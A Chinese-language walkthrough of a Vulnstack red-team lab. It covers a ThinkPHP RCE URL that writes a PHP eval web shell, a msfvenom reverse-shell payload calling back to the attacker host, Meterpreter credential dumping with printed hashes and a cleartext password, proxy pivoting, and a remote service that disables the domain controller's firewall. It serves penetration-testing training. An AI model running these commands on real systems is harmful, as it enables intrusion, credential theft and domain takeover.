内网渗透ATT&CK红队评估-5

入门级内网渗透靶场,无杀软,没有难度,适合新手练手,熟悉渗透流程。

靶机地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

环境拓扑图:

1.信息收集

1.2端口扫描

┌──(root㉿kali)-[/home/kali]└─# nmap -sV -sC 192.168.56.136Starting Nmap 7.92 () at 2022-05-01 08:57 EDTNmap scan report for 192.168.56.136Host is up (0.00039s latency).Not shown: 997 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp openhttpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)3306/tcp openmysql MySQL (unauthorized)5357/tcp openhttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)MAC Address: 00:0C:29:69:31:70 (VMware)Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

直接打开80端口查看web页面

直接在网页后加上不存在的字符 让他报错,报错页面中含有版本信息。

版本为thinkphpV5.0.22  没有其他的功能 直接搜索相关的历史漏洞

thinkphp漏洞合集:

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

1.2getshell

直接上EXP写入马子

http://192.168.56.136/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_POST[%22x%22])?^%3E%3Eshell.php

中国蚁剑链接

1.3内网信息收集

ipconfig /all #可以看到主机有两个IP而且一个DNS后缀是 sun.com 确定是域环境whoami#结果为 sun\administratornet time /domain#查看域控地址返回结果是\\DC.sun.comnet group "doamin users" /domain#查看域用户net group "domain admins"/domain#定位域管理员 结果为 administrator,很幸运本台机器就是ping dc.sun.com #即可返回域控的IP

C:\phpStudy\PHPTutorial\WWW\public> ipconfig /allWindows IP 配置 主机名. . . . . . . . . . . . . : win7 主 DNS 后缀 . . . . . . . . . . . : sun.com 节点类型. . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 DNS 后缀搜索列表. . . . . . . . : sun.com localdomain以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2 物理地址. . . . . . . . . . . . . : 00-0C-29-69-31-7A DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::6405:f1f4:28f0:3fee%16(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.138.136(首选) 子网掩码. . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : DHCPv6 客户端 DUID. . . . . . . : 00-01-00-01-25-F1-93-23-00-0C-29-CE-6E-F7 DNS 服务器. . . . . . . . . . . : 192.168.138.138 TCPIP 上的 NetBIOS. . . . . . . : 已启用以太网适配器 wk1 waiwang: 连接特定的 DNS 后缀 . . . . . . . : localdomain 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection 物理地址. . . . . . . . . . . . . : 00-0C-29-69-31-70 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::a119:57e6:82f8:b8b3%11(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.56.136(首选) 子网掩码. . . . . . . . . . . . : 255.255.255.0 获得租约的时间. . . . . . . . . : 2022年5月1日 20:54:38 租约过期的时间. . . . . . . . . : 2022年5月1日 21:39:38 默认网关. . . . . . . . . . . . . : 192.168.56.2 DHCP 服务器 . . . . . . . . . . . : 192.168.56.254 DHCPv6 IAID . . . . . . . . . . . : DHCPv6 客户端 DUID. . . . . . . : 00-01-00-01-25-F1-93-23-00-0C-29-CE-6E-F7 DNS 服务器. . . . . . . . . . . : 8.8.8.8 主 WINS 服务器. . . . . . . . . : 192.168.56.2 TCPIP 上的 NetBIOS. . . . . . . : 已启用隧道适配器 isatap.localdomain: 媒体状态. . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : localdomain 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{522E987F-D8BB-4F8D-BD80-6B57C75E348D}: 媒体状态. . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是C:\phpStudy\PHPTutorial\WWW\public> net group "domain controllers" /domain这项请求将在域 sun.com 的域控制器处理。组名 Domain Controllers注释 域中所有域控制器成员-------------------------------------------------------------------------------DC$命令成功完成。

总结:

域控:DC.sun.com域控IP:192.168.138.138拿到域管理员权限,那就可以登录域内任何一台机器了

2.横向移动

由于中国蚁剑对后渗透模块支持的不好,接下来的活交给MSF

2.1MSF生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.135 lport=4444 -f exe >win7.exe

开启监听:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.56.135set lport 4444exploit -j

把生成的木马用中国蚁剑传到目标机

监听上线:

2.2 抓取密码

首先把进程迁移到64位的进程上面 需要system权限

getsystem #由管理员权限提升到system权限psmigrate 674#迁移到64位进程上面meterpreter > creds_all#获取所有凭证[+] Running as SYSTEM[*] Retrieving all credentialsmsv credentials===============Username DomainLMNTLMSHA1-------- ----------------AdministratorSUN 3968bf278df10f70ea0ec27df2cdbc711417b80bd3d01b7926c8df0bbccc655c67a06189fcfac11aba5ef74c0c3648bb60WIN7$SUN 940e0b89fade5536d78f4dd9cbf16c30f91f86e048ed801cd4816b8f5f6868cc7c8449c5wdigest credentials===================Username DomainPassword-------- --------------(null) (null)(null)AdministratorSUN dc1234.com

密码为dc1234.com

2.3添加路由

由于我们的kali无法直接和域控机器通信,所以要借助win7跳板机和域控通信

run get_local_subnets#获取目标内网相关信息run autoroute -s 192.168.138.0/24#添加路由run autoroute -p#查看路由

2.4 开启代理

(或者用frp代理工具,目标机设置为服务端  kali设置成服务端)

这里默认是socks5代理

use auxiliary/server/socks_proxy#使用代理模块msf6 auxiliary(server/socks_proxy) > optionsModule options (auxiliary/server/socks_proxy): NameCurrent SettingRequiredDescription -------------------------------------- PASSWORD noProxy password for SOCKS5 listener SRVHOST 0.0.0.0yes The address to listen on SRVPORT 1080 yes The port to listen on USERNAME noProxy username for SOCKS5 listener VERSION 5yes The SOCKS version to use (Accepted: 4a, 5)Auxiliary action: Name Description ---- ----------- ProxyRun a SOCKS proxy servermsf6 auxiliary(server/socks_proxy) >run #不用设置什么 直接run即可[*] Starting interaction with 1...

2.5nmap扫描内网

首先编辑代理配置文件

vim /etc/proxychins4

最后一行加上

socks5 127.0.0.1 1080

挂上代理用nmap扫描

prochains4 nmap -sT -sV -sC -Pn 192.168.138.138

目标开启了445端口 可以直接用psexec攻击

2.6登录接域控

proxychains impacket-wmiexec sun/administrator:[email protected]

如果上一步连接不上,需要关闭Windows2008的防火墙

首先再windows7操作 简历与win2008 的$ipc链接net use \\192.168.138.138\ipc$ "dc1234.com" /user:"administrator"//创建服务关闭防火墙sc \\192.168.138.138 create unablefirewall binpath="netsh advfirewall set allprofiles set off"sc \\192.168.138.138 start unablefirewall